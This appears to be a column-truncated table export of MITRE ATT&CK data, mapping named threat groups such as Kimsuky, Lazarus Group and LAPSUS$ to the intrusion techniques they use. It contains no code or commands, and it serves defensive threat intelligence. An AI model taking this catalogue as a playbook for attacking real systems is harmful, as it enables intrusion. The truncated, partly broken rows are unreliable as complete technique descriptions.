G0119 Indrik Spidintrusion- group uses T1078 Valid Acco attack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1059.003Windows Cattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1047 Windows M attack-pat technique [Indrik Sp
G0004 Ke3chang intrusion- group uses T1560 Archive Coattack-pat technique The [Ke3ch
G0004 Ke3chang intrusion- group uses T1560.001Archive viaattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1119 Automatedattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1020 Automatedattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1078.004Cloud Accoattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1059 Command attack-pat
an technique Malware us
G0004 Ke3chang intrusion- group uses T1071.004DNS attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1005 Data from attack-pat technique [Ke3chang](
G0004 Ke3chang intrusion- group uses T1140 Deobfuscatattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1087.002Domain Acattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1069.002Domain Grattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1041 Exfiltratio attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1190 Exploit Pubattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1133 External R attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1083 File and Di attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1558.001Golden Ticattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1105 Ingress Tooattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1056.001Keyloggingattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1003.004LSA Secret attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1003.001LSASS Memattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1087.001Local Acco attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1587.001Malware attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1036.005Match Legiattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1003.003NTDS attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1027 Obfuscatedattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1057 Process Di attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1547.001Registry Ruattack-pat technique Several [K
G0004 Ke3chang intrusion- group uses T1114.002Remote Ema attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1018 Remote Sysattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1036.002Right-to-Leattack-pat technique [Ke3chang](
G0004 Ke3chang intrusion- group uses T1021.002SMB/Windo attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1003.002Security A attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1569.002Service Ex attack-pat technique [Ke3chang](
G0004 Ke3chang intrusion- group uses T1213.002Sharepointattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1082 System Inf attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1614.001System Lanattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1016 System Netattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1049 System Netattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1033 System Own attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1007 System Serattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1588.002Tool attack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1078 Valid Acco attack-pat technique [Ke3chang](
G0004 Ke3chang intrusion- group uses T1071.001Web Protocattack-pat technique [Ke3chang]
G0004 Ke3chang intrusion- group uses T1059.003Windows Cattack-pat technique [Ke3chang](
G0004 Ke3chang intrusion- group uses T1543.003Windows Se attack-pat technique [Ke3chang]
G0094 Kimsuky intrusion- group uses T1583 Acquire Infattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1098.007Additional attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1557 Adversary-attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1560.003Archive vi attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1560.001Archive viaattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1102.002Bidirectio attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1176 Browser Exattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1546.001Change Defa attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1553.002Code Signi attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1552.001Credentialsattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1555.003Credential attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1005 Data from attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1140 Deobfuscatattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1587 Develop Cap attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1562.004Disable or attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1562.001Disable or attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1583.001Domains attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1584.001Domains attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1586.002Email Accoattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1585.002Email Accoattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1589.002Email Addrattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1114.003Email Forwattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1589.003Employee attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1041 Exfiltratio attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1567.002Exfiltratio attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1190 Exploit Pubattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1588.005Exploits attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1133 External R attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1070.004File Deleti attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1071.002File Transf attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1083 File and Di attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1657 Financial Tattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1591 Gather Vic attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1564.002Hidden Useattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1564.003Hidden Wi attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1105 Ingress Tooattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1534 Internal Spattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1059.007JavaScript attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1056.001Keyloggingattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1003.001LSASS Memattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1136.001Local Acco attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1078.003Local Acco attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1074.001Local Data attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1071.003Mail Protocattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1204.002Malicious Fattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1204.001Malicious Lattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1587.001Malware attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1036.004Masquerade attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1036.005Match Legiattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1112 Modify Regattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1218.005Mshta attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1111 Multi-Factoattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1040 Network Snattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1027 Obfuscatedattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1550.002Pass the H attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1598 Phishing foattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1059.001PowerShellattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1057 Process Di attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1055.012Process Hoattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1055 Process Injattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1059.006Python attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1012 Query Regiattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1620 Reflective attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1547.001Registry Ruattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1218.010Regsvr32 attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1219 Remote Accattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1021.001Remote Des attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1114.002Remote Ema attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1218.011Rundll32 attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1053.005Scheduled attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1593.002Search Engattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1594 Search Vic attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1518.001Security S attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1583.004Server attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1593.001Social Medattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1585.001Social Medattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1027.002Software Pattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1566.001Spearphishattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1566.002Spearphishattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1598.003Spearphishattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1082 System Inf attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1016 System Netattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1007 System Serattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1070.006Timestompattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1588.002Tool attack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1608.001Upload Maattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1059.005Visual Basiattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1071.001Web Protocattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1583.006Web Servicattack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1505.003Web Shell attack-pat technique [Kimsuky](h
G0094 Kimsuky intrusion- group uses T1059.003Windows Cattack-pat technique [Kimsuky](
G0094 Kimsuky intrusion- group uses T1543.003Windows Se attack-pat technique [Kimsuky](h
G1004 LAPSUS$ intrusion- group uses T1531 Account Acattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1098.003Additional attack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1591.002Business Reattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1552.008Chat Mess attack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1136.003Cloud Accoattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1078.004Cloud Accoattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1593.003Code Reposattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1213.003Code Reposattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1213.001Confluenceattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1578.002Create Clo attack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1589.001Credentialsattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1555.003Credential attack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1003.006DCSync attack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1584.002DNS Serverattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1485 Data Destrattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1005 Data from attack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1578.003Delete Clo attack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1087.002Domain Acattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1069.002Domain Grattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1586.002Email Accoattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1589.002Email Addrattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1114.003Email Forwattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1068 Exploitatioattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1133 External R attack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1589 Gather Victattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1591.004Identify Roattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1656 Impersonatattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1588.001Malware attack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1213.005Messaging attack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1111 Multi-Factoattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1621 Multi-Fact attack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1003.003NTDS attack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1555.005Password attack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1090 Proxy attack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1597.002Purchase Tattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1489 Service Stoattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1213.002Sharepointattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1598.004Spearphishattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1588.002Tool attack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1199 Trusted Relattack-pat technique [LAPSUS$](h
G1004 LAPSUS$ intrusion- group uses T1204 User Execuattack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1078 Valid Acco attack-pat technique [LAPSUS$](
G1004 LAPSUS$ intrusion- group uses T1583.003Virtual Pri attack-pat technique [LAPSUS$](
G0032 Lazarus Gr intrusion- group uses T1098 Account Ma attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1010 Applicatio attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1560 Archive Coattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1560.003Archive vi attack-pat technique A [Lazarus
G0032 Lazarus Gr intrusion- group uses T1560.002Archive viaattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1102.002Bidirectio attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1542.003Bootkit attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1070.003Clear Comm attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1553.002Code Signi attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1134.002Create Proattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1574.002DLL Side-L attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1485 Data Destrattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1005 Data from attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1140 Deobfuscatattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1588.004Digital Certattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1562.004Disable or attack-pat technique Various [La
G0032 Lazarus Gr intrusion- group uses T1562.001Disable or attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1561.001Disk Conteattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1561.002Disk Struc attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1583.001Domains attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1189 Drive-by C attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1027.007Dynamic APattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1055.001Dynamic-linattack-pat technique A [Lazarus
G0032 Lazarus Gr intrusion- group uses T1585.002Email Accoattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1589.002Email Addrattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1027.013Encrypted/attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1041 Exfiltratio attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1048.003Exfiltrati attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1203 Exploitatioattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1090.002External Prattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1008 Fallback C attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1070.004File Deleti attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1083 File and Di attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1591 Gather Vic attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1564.001Hidden Fileattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1070 Indicator attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1202 Indirect C attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1105 Ingress Tooattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1491.001Internal D attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1090.001Internal Prattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1574.013KernelCall attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1056.001Keyloggingattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1557.001LLMNR/NBT attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1074.001Local Data attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1204.002Malicious Fattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1587.001Malware attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1036.004Masquerade attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1036.005Match Legiattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1218.005Mshta attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1104 Multi-Stag attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1106 Native API attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1046 Network Seattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1571 Non-Standaattack-pat technique Some [Lazar
G0032 Lazarus Gr intrusion- group uses T1110.003Password Sattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1059.001PowerShellattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1057 Process Di attack-pat technique Several [La
G0032 Lazarus Gr intrusion- group uses T1001.003Protocol o attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1012 Query Regiattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1620 Reflective attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1547.001Registry Ruattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1021.001Remote Des attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1036.003Rename Sys attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1218.011Rundll32 attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1021.002SMB/Windo attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1021.004SSH attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1053.005Scheduled attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1584.004Server attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1489 Service Stoattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1547.009Shortcut Mattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1585.001Social Medattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1566.001Spearphishattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1566.002Spearphishattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1566.003Spearphishiattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1132.001Standard Eattack-pat technique A [Lazarus
G0032 Lazarus Gr intrusion- group uses T1573.001Symmetric attack-pat technique Several [La
G0032 Lazarus Gr intrusion- group uses T1218 System Binattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1082 System Inf attack-pat technique Several [La
G0032 Lazarus Gr intrusion- group uses T1016 System Netattack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1049 System Netattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1033 System Own attack-pat technique Various [La
G0032 Lazarus Gr intrusion- group uses T1529 System Sh attack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1124 System Timattack-pat technique A Destover-
G0032 Lazarus Gr intrusion- group uses T1070.006Timestompattack-pat technique Several [La
G0032 Lazarus Gr intrusion- group uses T1588.002Tool attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1078 Valid Acco attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1059.005Visual Basiattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1071.001Web Protocattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1583.006Web Servicattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1059.003Windows Cattack-pat technique [Lazarus G
G0032 Lazarus Gr intrusion- group uses T1047 Windows M attack-pat technique [Lazarus Gr
G0032 Lazarus Gr intrusion- group uses T1543.003Windows Se attack-pat technique Several [La
G0140 LazyScripteintrusion- group uses T1027.010Command aOttack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1071.004DNS attack-pat technique [LazyScrip
G0140 LazyScripteintrusion- group uses T1583.001Domains attack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1105 Ingress Tooattack-pat technique [LazyScrip
G0140 LazyScripteintrusion- group uses T1059.007JavaScript attack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1204.002Malicious Fattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1204.001Malicious Lattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1588.001Malware attack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1036 Masqueradattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1218.005Mshta attack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1059.001PowerShellattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1547.001Registry Ruattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1218.011Rundll32 attack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1566.001Spearphishattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1566.002Spearphishattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1608.001Upload Maattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1059.005Visual Basiattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1102 Web Servicattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1583.006Web Servicattack-pat technique [LazyScript
G0140 LazyScripteintrusion- group uses T1059.003Windows Cattack-pat technique [LazyScript
G0077 Leafminer intrusion- group uses T1003.005Cached Dom attack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1027.010Command aOttack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1552.001Credentialsattack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1555 Credential attack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1555.003Credential attack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1189 Drive-by C attack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1083 File and Di attack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1059.007JavaScript attack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1003.004LSA Secret attack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1003.001LSASS Memattack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1136.001Local Acco attack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1046 Network Seattack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1110.003Password Sattack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1055.013Process Doattack-pat technique [Leafminer
G0077 Leafminer intrusion- group uses T1114.002Remote Ema attack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1018 Remote Sysattack-pat technique [Leafminer]
G0077 Leafminer intrusion- group uses T1588.002Tool attack-pat technique [Leafminer]
G0065 Leviathan intrusion- group uses T1560 Archive Coattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1197 BITS Jobs attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1027.001Binary Padattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1553.002Code Signi attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1589.001Credentialsattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1140 Deobfuscatattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1583.001Domains attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1189 Drive-by C attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1559.002Dynamic Daattack-pat technique [Leviathan
G0065 Leviathan intrusion- group uses T1055.001Dynamic-linattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1586.002Email Accoattack-pat technique [Leviathan
G0065 Leviathan intrusion- group uses T1585.002Email Accoattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1027.013Encrypted/attack-pat technique [Leviathan
G0065 Leviathan intrusion- group uses T1041 Exfiltratio attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1567.002Exfiltratio attack-pat technique [Leviathan
G0065 Leviathan intrusion- group uses T1203 Exploitatioattack-pat technique [Leviathan
G0065 Leviathan intrusion- group uses T1133 External R attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1105 Ingress Tooattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1534 Internal Spattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1003.001LSASS Memattack-pat technique [Leviathan
G0065 Leviathan intrusion- group uses T1074.001Local Data attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1204.002Malicious Fattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1204.001Malicious Lattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1090.003Multi-hop attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1003 OS Credentattack-pat technique [Leviathan
G0065 Leviathan intrusion- group uses T1102.003One-Way Cattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1059.001PowerShellattack-pat technique [Leviathan
